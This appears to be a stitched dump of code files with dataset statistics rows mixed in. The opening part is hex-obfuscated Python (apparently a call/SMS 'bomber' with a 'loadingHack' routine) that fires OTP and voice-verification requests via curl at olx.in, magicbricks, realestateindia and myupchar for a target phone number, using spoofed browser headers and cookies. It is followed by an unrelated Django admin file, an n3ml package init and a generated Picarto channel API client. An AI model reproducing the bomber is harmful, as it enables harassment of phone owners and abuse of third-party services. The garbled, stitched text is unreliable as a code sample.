36\x32\x36\x35\x32\x35\x39\x30\x39\x2e\x31\x35\x36\x30\x38\x33\x36\x33\x36\x39\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x3d\x47\x41\x31\x2e\x32\x2e\x31\x30\x33\x33\x30\x37\x39\x33\x33\x31\x2e\x31\x35\x36\x30\x38\x33\x36\x33\x36\x39\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x76\x69\x73\x69\x74\x65\x64\x54\x6f\x6b\x65\x6e\x3d\x31\x37\x36\x39\x36\x31\x35\x36\x30\x38\x33\x36\x33\x36\x37\x22\x20\x2d\x64\x20\x5c\x27\x61\x63\x74\x69\x6f\x6e\x5f\x69\x64\x3d\x63\x61\x6c\x6c\x5f\x74\x6f\x5f\x6f\x74\x70\x26\x6d\x6f\x62\x5f\x6e\x75\x6d\x3d\x27\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x26\x6d\x65\x6d\x62\x65\x72\x5f\x69\x64\x3d\x31\x35\x34\x37\x30\x34\x35\x5c\x27\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x65\x61\x6c\x65\x73\x74\x61\x74\x65\x69\x6e\x64\x69\x61\x2e\x63\x6f\x6d\x2f\x6d\x6f\x62\x69\x6c\x65\x2d\x73\x63\x72\x69\x70\x74\x2f\x69\x6e\x64\x69\x61\x6e\x5f\x6d\x6f\x62\x69\x6c\x65\x5f\x76\x65\x72\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x5f\x66\x6f\x72\x6d\x2e
\x70\x68\x70\x3f\x73\x69\x64\x3d\x30\x2e\x35\x39\x38\x33\x32\x32\x31\x33\x39\x35\x38\x30\x35\x33\x35\x34\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x6c\x6f\x77\x65\x72\x28\x29\x2e\x66\x69\x6e\x64\x28\x22\x79\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x33\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x73\x2e\x73\x79\x73\x74\x65\x6d\x28\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x50\x4f\x53\x54\x20\x2d\x48\x20\x22\x48\x6f\x73\x74\x3a\x77\x77\x77\x2e\x6f\x6c\x78\x2e\x69\x6e\x22\x20\x2d\x48\x20\x22\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x3a\x34\x34\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x3a\x2a\x2f\x2a\x22\x20\x2d\x48\x20\x22\x78\x2d\x6e\x65\x77\x72\x65\x6c\x69\x63\x2d\x69\x64\x3a\x56\x51\x4d\x47\x55\x31\x5a\x56\x44\x78\x41\x42\x55\x31\x6c\x62\x42\x67\x4d\x44\x55\x6c\x49\x3d\x22\x20\x2d\x48\x20\x22\x6f\x72\x69\x67\x69\x6e\x3a\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\x6c\x78\x2e\x69\x6e\x22\x20\x2d\x48\x20\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x3a\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x35\x2e\x30\x2e\x32\x3b\x20\x53\x48\x2d\x30\x34\x47\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x22\x20\x2d\x48\x20\x22\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x3a\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x22\x20\x2d\x48\x20\x22\x72\x65\x66\x65\x72\x65\x72\x3a\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\x6c\x78\x2e\x69\x6e\x2f\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70
\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x3a\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6f\x6e\x61\x70\x3d\x31\x36\x62\x31\x62\x38\x66\x34\x38\x64\x34\x78\x37\x34\x36\x64\x34\x37\x61\x62\x2d\x31\x2d\x31\x36\x62\x31\x62\x38\x66\x34\x38\x64\x34\x78\x37\x34\x36\x64\x34\x37\x61\x62\x2d\x31\x39\x2d\x31\x35\x35\x39\x35\x33\x37\x33\x34\x35\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x62\x6d\x5f\x73\x76\x3d\x43\x44\x42\x39\x37\x46\x35\x30\x44\x41\x36\x36\x31\x35\x41\x43\x34\x32\x30\x46\x33\x45\x36\x45\x37\x37\x42\x30\x34\x45\x34\x32\x7e\x4f\x6f\x58\x32\x66\x41\x75\x50\x37\x67\x67\x63\x4e\x61\x30\x56\x6a\x7a\x45\x39\x35\x46\x7a\x4a\x4e\x4b\x52\x64\x4a\x6c\x57\x30\x39\x48\x6a\x61\x30\x2f\x63\x79\x73\x49\x47\x46\x31\x73\x4a\x6f\x42\x4f\x37\x69\x30\x6e\x64\x47\x58\x71\x6e\x54\x57\x4c\x61\x75\x6e\x6c\x79\x78\x6b\x74\x48\x4c\x62\x45\x38\x42\x53\x73\x74\x50\x43\x52\x59\x6e\x38\x56\x64\x50\x31\x35\x6c\x76\x55\x78\x4b\x33\x5a\x59\x39\x61\x68\x58\x4f\x53\x67\x77\x41\x69\x64\x78\x77\x58\x64\x31\x6a\x43\x65\x35\x77\x6a\x49\x7a\x59\x62\x69\x58\x70\x35\x65\x4b\x4e\x57\x66\x46\x70\x6f\x77\x68\x46\x62\x70\x78\x6c\x6f\x65\x2b\x53\x72\x62\x69\x45\x30\x59\x48\x4a\x56\x50\x63\x43\x56\x35\x62\x6d\x64\x73\x48\x67\x50\x66\x51\x63\x3d\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x41\x4d\x50\x5f\x54\x4f\x4b\x45\x4e\x3d\x25\x32\x34\x4e\x4f\x54\x5f\x46\x4f\x55\x4e\x44\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x68\x69\x6e\x74\x3d\x74\x72\x75\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x69\x64\x3d\x47\x41\x31\x2e\x32\x2e\x33\x36\x39\x38\x31\x39\x32\x37\x36\x2e\x31\x35\x35\x39\x35\x33\x35\x35\x31\x37\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x3d\x47\x41\x31\x2e\x32\x2e\x36\x36\x35\x36\x38\x38\x37\x35\x33\x2e\x31\x35\x35
\x39\x35\x33\x35\x35\x31\x37\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6c\x64\x54\x64\x3d\x74\x72\x75\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x47\x5f\x45\x4e\x41\x42\x4c\x45\x44\x5f\x49\x44\x50\x53\x3d\x67\x6f\x6f\x67\x6c\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x48\x49\x44\x45\x5f\x4f\x4e\x42\x4f\x41\x52\x44\x49\x4e\x47\x5f\x4c\x4f\x43\x41\x54\x49\x4f\x4e\x3d\x74\x72\x75\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x74\x65\x73\x74\x43\x6f\x6f\x6b\x69\x65\x3d\x74\x65\x73\x74\x43\x6f\x6f\x6b\x69\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x61\x6b\x5f\x62\x6d\x73\x63\x3d\x33\x30\x37\x43\x35\x33\x31\x31\x46\x42\x30\x30\x41\x33\x46\x34\x45\x38\x35\x36\x41\x46\x46\x45\x31\x41\x39\x44\x30\x30\x30\x42\x30\x32\x31\x34\x42\x45\x44\x39\x45\x30\x32\x31\x30\x30\x30\x30\x39\x30\x39\x46\x46\x34\x35\x43\x31\x45\x38\x30\x32\x30\x36\x37\x7e\x70\x6c\x46\x5a\x66\x62\x4d\x51\x47\x67\x45\x44\x72\x37\x4f\x57\x56\x65\x39\x46\x76\x71\x66\x54\x32\x34\x5a\x74\x4f\x56\x4d\x61\x6d\x74\x59\x63\x61\x69\x70\x37\x31\x49\x59\x4f\x72\x76\x32\x2b\x53\x51\x36\x66\x6f\x6b\x53\x76\x4d\x6b\x32\x55\x65\x73\x7a\x35\x76\x31\x73\x46\x66\x61\x69\x63\x68\x62\x74\x44\x67\x65\x56\x53\x6a\x33\x74\x65\x33\x76\x58\x4a\x4b\x65\x7a\x53\x57\x67\x76\x6f\x56\x57\x72\x4b\x37\x67\x66\x7a\x46\x72\x4c\x7a\x31\x72\x75\x42\x6d\x30\x4d\x51\x6a\x30\x31\x56\x35\x43\x6d\x70\x61\x54\x72\x36\x74\x52\x67\x44\x52\x53\x4e\x36\x62\x6b\x73\x33\x6e\x71\x76\x4f\x48\x7a\x52\x30\x74\x41\x31\x49\x6f\x71\x66\x44\x66\x71\x32\x4d\x4b\x74\x6d\x44\x6a\x62\x6b\x6e\x43\x49\x35\x46\x6c\x4c\x59\x55\x54\x77\x71\x6c\x6e\x77\x48\x6f\x77\x59\x41\x72\x66\x79\x62\x6e\x32\x6e\x33\x79\x69\x6c\x45\x36\x56\x4b\x48\x6a\x57\x2b\x74\x48\x38\x6b\x71\x6a\x41\x66\x48\x38\x42\x47\x75\x69\x6a\x70\x6d\x4f\x39\x70\x4e\x6b\x67\x6d\x49\x79\x4f\x65\x61\x5a\x49\x56\x4d\x33\x6b\x36\x46\x47\x4f\x4c\x33\x57\x6a\x33\x6a\x4c\x49\x38\x75\x47\x61\x55\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x61\x62\x63
\x6b\x3d\x31\x35\x33\x42\x44\x33\x44\x33\x33\x33\x39\x34\x38\x41\x35\x38\x39\x33\x32\x37\x34\x38\x43\x41\x43\x33\x44\x34\x43\x33\x46\x34\x30\x32\x31\x34\x42\x45\x44\x39\x45\x30\x32\x31\x30\x30\x30\x30\x39\x30\x39\x46\x46\x34\x35\x43\x31\x38\x38\x33\x38\x45\x30\x35\x7e\x30\x7e\x38\x4f\x2b\x75\x64\x78\x64\x47\x33\x38\x73\x42\x46\x54\x50\x5a\x70\x61\x42\x4c\x34\x49\x47\x6a\x37\x65\x55\x63\x4b\x4a\x31\x56\x77\x41\x74\x4a\x35\x32\x47\x4d\x4f\x35\x45\x3d\x7e\x2d\x31\x7e\x2d\x31\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x62\x6d\x5f\x73\x7a\x3d\x42\x44\x36\x36\x35\x44\x39\x31\x39\x46\x37\x43\x36\x46\x41\x38\x33\x37\x34\x46\x31\x39\x36\x34\x34\x35\x35\x39\x36\x34\x33\x36\x7e\x59\x41\x41\x51\x32\x62\x34\x55\x41\x72\x70\x4f\x41\x77\x74\x72\x41\x51\x41\x41\x71\x30\x71\x50\x47\x77\x4e\x6b\x73\x48\x42\x67\x70\x68\x4c\x77\x44\x7a\x77\x66\x42\x6c\x77\x49\x52\x51\x4a\x41\x47\x37\x74\x78\x6d\x6a\x42\x6f\x2f\x6f\x66\x37\x4e\x69\x41\x4a\x39\x33\x67\x79\x2f\x37\x76\x42\x68\x51\x39\x6c\x35\x73\x49\x4b\x64\x77\x74\x6c\x32\x6a\x2b\x55\x34\x62\x79\x73\x32\x48\x68\x68\x35\x74\x5a\x6c\x5a\x4c\x2f\x6a\x71\x64\x6e\x57\x2f\x4a\x72\x67\x6d\x67\x61\x77\x63\x78\x69\x75\x6e\x41\x4a\x33\x32\x42\x62\x59\x39\x55\x74\x6e\x46\x49\x72\x4e\x78\x62\x62\x52\x76\x7a\x51\x43\x59\x6e\x53\x77\x66\x2f\x63\x7a\x39\x61\x37\x6a\x55\x52\x73\x75\x69\x37\x6c\x65\x75\x4c\x61\x56\x6d\x37\x6d\x51\x45\x63\x48\x50\x4f\x74\x43\x36\x67\x35\x6a\x72\x54\x6f\x41\x4d\x54\x62\x64\x41\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x39\x37\x63\x30\x39\x65\x32\x61\x61\x62\x64\x66\x65\x64\x38\x39\x62\x38\x37\x61\x33\x30\x31\x30\x64\x37\x66\x31\x33\x63\x36\x34\x3d\x33\x35\x33\x62\x34\x66\x39\x66\x64\x38\x32\x64\x32\x36\x32\x36\x38\x61\x64\x31\x31\x62\x32\x63\x31\x65\x39\x61\x65\x30\x31\x39\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6c\x71\x73\x74\x61\x74\x75\x73\x3d\x31\x35\x35\x39\x35\x33\x36\x37\x30\x34\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6c\x61\x71\x75\x65\x73\x69\x73\x3d\x70\x61\x6e\x2d\x32
\x36\x33\x38\x31\x40\x61\x23\x70\x61\x6e\x2d\x32\x37\x37\x35\x32\x40\x62\x23\x70\x61\x6e\x2d\x33\x30\x30\x34\x33\x40\x62\x23\x70\x61\x6e\x61\x2d\x32\x36\x33\x38\x31\x40\x62\x22\x20\x2d\x64\x20\x5c\x27\x7b\x22\x74\x79\x70\x65\x22\x3a\x22\x63\x61\x6c\x6c\x22\x2c\x22\x64\x65\x73\x63\x72\x69\x70\x74\x6f\x72\x22\x3a\x22\x2b\x39\x31\x27\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x22\x7d\x5c\x27\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\x6c\x78\x2e\x69\x6e\x2f\x61\x70\x69\x2f\x63\x68\x61\x6c\x6c\x65\x6e\x67\x65\x73\x22\x20\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x34\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x47\x45\x54\x20\x2d\x48\x20\x22\x48\x6f\x73\x74\x3a\x61\x70\x69\x2e\x6d\x61\x67\x69\x63\x62\x72\x69\x63\x6b\x73\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x22\x20\x2d\x48\x20\x22\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x58\x31\x31\x3b\x20\x4c\x69\x6e\x75\x78\x20\x78\x38\x36\x5f\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x35\x2e\x30\x2e\x33\x37\x37\x30\x2e\x38\x39\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x22\x20\x2d\x48\x20\x22\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x3a\x6f\x6e\x22\x20\x2d\x48\x20\x22\x41\x63\x63\x65\x70\x74\x3a\x69\x6d\x61\x67\x65\x2f\x77\x65\x62\x70\x2c\x69\x6d\x61\x67\x65\x2f\x61\x70\x6e\x67\x2c\x69\x6d\x61\x67\x65\x2f\x2a\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x22\x20\x2d\x48\x20\x22\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x67\x7a
\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x22\x20\x2d\x48\x20\x22\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x22\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x6d\x61\x67\x69\x63\x62\x72\x69\x63\x6b\x73\x2e\x63\x6f\x6d\x2f\x62\x72\x69\x63\x6b\x73\x2f\x76\x65\x72\x69\x66\x79\x4f\x6e\x43\x61\x6c\x6c\x2e\x68\x74\x6d\x6c\x3f\x6d\x6f\x62\x69\x6c\x65\x3d\x27\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x2e\x64\x65\x63\x6f\x64\x65\x28\x27\x75\x74\x66\x2d\x38\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x6c\x6f\x77\x65\x72\x28\x29\x2e\x73\x74\x72\x69\x70\x28\x29\x2e\x66\x69\x6e\x64\x28\x27\x63\x61\x6c\x6c\x6d\x61\x64\x65\x27\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x36\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6d\x79\x75\x70\x63\x68\x61\x72\x2e\x63\x6f\x6d\x2f\x75\x73\x65\x72\x5f\x70\x72\x6f\x66\x69\x6c\x65\x2f\x72\x65\x73\x65\x6e\x64\x5f\x6f\x74\x70\x5f\x76\x69\x61\x5f\x76\x6f\x69\x63\x65\x3f\x69\x64\x3d\x27\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x22\x31\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x46\x61\x6c\x73\x65
'''
file2.writelines(L)
file2.close()
if __name__=='__main__':
verCheck()
p1 = Process(target = magic())
p1.start()
p2 = Process(target = loadingHack())
p2.start()
print("\n")
#
| 1,834.842593
| 105,764
| 0.746285
| 49,100
| 198,163
| 3.01167
| 0.005356
| 0.263659
| 0.347589
| 0.399992
| 0.877023
| 0.848438
| 0.806631
| 0.790422
| 0.781407
| 0.773218
| 0
| 0.418967
| 0.004562
| 198,163
| 107
| 105,765
| 1,851.990654
| 0.330672
| 0.000469
| 0
| 0.298969
| 0
| 0.103093
| 0.986817
| 0.980264
| 0.010309
| 1
| 0
| 0
| 0
| 1
| 0.030928
| false
| 0.030928
| 0.195876
| 0
| 0.226804
| 0.103093
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 16
|
e9ef26d833beeeaca1abd582477a506db5feff38
| 195
|
py
|
Python
|
talks_keeper/admin.py
|
samitnuk/talks_keeper
|
c4911598d291edd4cd59f91ca903fbadf12bbda9
|
[
"MIT"
] | null | null | null |
talks_keeper/admin.py
|
samitnuk/talks_keeper
|
c4911598d291edd4cd59f91ca903fbadf12bbda9
|
[
"MIT"
] | null | null | null |
talks_keeper/admin.py
|
samitnuk/talks_keeper
|
c4911598d291edd4cd59f91ca903fbadf12bbda9
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from . import models
# Expose every talks-keeper model in the admin site with default options.
for _model in (models.Country, models.Company, models.Talk, models.Label):
    admin.site.register(_model)
| 21.666667
| 35
| 0.815385
| 28
| 195
| 5.678571
| 0.428571
| 0.226415
| 0.427673
| 0.578616
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071795
| 195
| 8
| 36
| 24.375
| 0.878453
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
43fab1f4deb34e58b9dd2a9b706240a22940f038
| 175
|
py
|
Python
|
n3ml/__init__.py
|
neurom-iot/n3ml
|
39c6b50661f293d58b4b37ef613643860724bb24
|
[
"MIT"
] | 11
|
2019-03-15T17:20:54.000Z
|
2022-03-01T08:25:36.000Z
|
n3ml/__init__.py
|
neurom-iot/n3ml
|
39c6b50661f293d58b4b37ef613643860724bb24
|
[
"MIT"
] | 7
|
2019-03-15T16:02:51.000Z
|
2021-12-03T08:17:06.000Z
|
n3ml/__init__.py
|
neurom-iot/n3ml
|
39c6b50661f293d58b4b37ef613643860724bb24
|
[
"MIT"
] | 9
|
2019-10-14T12:38:19.000Z
|
2021-12-02T04:49:28.000Z
|
# Re-export the serialization helpers at package top level.
from .serialization import save, savez, load, to_state_dict_fpga, to_state_dict_loihi

# Public API for ``from n3ml import *``.
__all__ = [
    'save',
    'savez',
    'load',
    'to_state_dict_fpga',
    'to_state_dict_loihi',
]
| 25
| 85
| 0.742857
| 26
| 175
| 4.384615
| 0.461538
| 0.245614
| 0.385965
| 0.263158
| 0.77193
| 0.77193
| 0.77193
| 0.77193
| 0.77193
| 0.77193
| 0
| 0
| 0.131429
| 175
| 6
| 86
| 29.166667
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
a12cf1d5b0e8a83f6907e3826f47d6f6ad0e9c03
| 18,977
|
py
|
Python
|
Contents/Libraries/Shared/PicartoClientAPI/apis/channel_api.py
|
Sythelux/Picarto.bundle
|
f2e9e9e75421b15c562c961c8c31090c508166ff
|
[
"BSD-3-Clause"
] | null | null | null |
Contents/Libraries/Shared/PicartoClientAPI/apis/channel_api.py
|
Sythelux/Picarto.bundle
|
f2e9e9e75421b15c562c961c8c31090c508166ff
|
[
"BSD-3-Clause"
] | 5
|
2018-01-29T23:18:20.000Z
|
2018-01-29T23:57:15.000Z
|
Contents/Libraries/Shared/PicartoClientAPI/apis/channel_api.py
|
Sythelux/Picarto.bundle
|
f2e9e9e75421b15c562c961c8c31090c508166ff
|
[
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
"""
Picarto.TV API Documentation
The Picarto.TV API documentation Note, for fixed access tokens, the header that needs to be sent is of the format: `Authorization: Bearer yourTokenHere` This can be generated at https://oauth.picarto.tv/ For chat API, see https://docs.picarto.tv/chat/chat.proto - contact via the email below for implementation details
OpenAPI spec version: 1.2.5
Contact: api@picarto.tv
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ChannelApi(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen

    All four public endpoints are simple GETs that differ only in path
    template, path-parameter name and response type, so the shared request
    plumbing lives in ``_call_channel_api``.
    """

    def __init__(self, api_client=None):
        """
        :param api_client: optional pre-configured ApiClient; when omitted,
            the client held by the global Configuration is used (and created
            lazily if it does not exist yet).
        """
        config = Configuration()
        if api_client:
            self.api_client = api_client
        else:
            if not config.api_client:
                config.api_client = ApiClient()
            self.api_client = config.api_client

    def _call_channel_api(self, resource_path, param_name, param_value,
                          response_type, method_name, kwargs):
        """
        Shared implementation for all /channel endpoints.

        Validates keyword arguments, checks the required path parameter and
        dispatches the HTTP GET through the underlying ApiClient.

        :param str resource_path: path template, e.g. '/channel/id/{channel_id}'
        :param str param_name: name of the single required path parameter
        :param param_value: value of that parameter (None raises ValueError)
        :param str response_type: deserialization target, e.g. 'ChannelDetails'
        :param str method_name: public method name, used in error messages
        :param dict kwargs: keyword arguments forwarded by the caller
        :return: whatever ApiClient.call_api returns
        :raises TypeError: on an unknown keyword argument
        :raises ValueError: when the required parameter is missing/None
        """
        all_params = [param_name, 'callback', '_return_http_data_only',
                      '_preload_content', '_request_timeout']
        params = {param_name: param_value}
        for key, val in kwargs.items():
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method %s" % (key, method_name)
                )
            params[key] = val
        # verify the required path parameter is set
        if params.get(param_name) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling `%s`"
                % (param_name, method_name))
        collection_formats = {}
        path_params = {param_name: params[param_name]}
        header_params = {}
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json; charset=utf-8', 'text/plain; charset=utf-8'])
        # Public channel endpoints need no authentication.
        auth_settings = []
        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        [],
                                        header_params,
                                        body=None,
                                        post_params=[],
                                        files={},
                                        response_type=response_type,
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def channel_id_channel_id_get(self, channel_id, **kwargs):
        """
        Gets information about a channel by ID

        Synchronous by default; pass a `callback` keyword to get the request
        thread back instead of the response.

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param int channel_id: Channel ID of user you wish to read (required)
        :return: ChannelDetails
            If the method is called asynchronously,
            returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.channel_id_channel_id_get_with_http_info(channel_id, **kwargs)
        (data) = self.channel_id_channel_id_get_with_http_info(channel_id, **kwargs)
        return data

    def channel_id_channel_id_get_with_http_info(self, channel_id, **kwargs):
        """
        Gets information about a channel by ID

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param int channel_id: Channel ID of user you wish to read (required)
        :return: ChannelDetails
            If the method is called asynchronously,
            returns the request thread.
        """
        return self._call_channel_api('/channel/id/{channel_id}', 'channel_id',
                                      channel_id, 'ChannelDetails',
                                      'channel_id_channel_id_get', kwargs)

    def channel_id_channel_id_videos_get(self, channel_id, **kwargs):
        """
        Get all videos for a channel by id

        Synchronous by default; pass a `callback` keyword to get the request
        thread back instead of the response.

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param int channel_id: Channel ID of the user you want to get videos for (required)
        :return: ChannelVideos
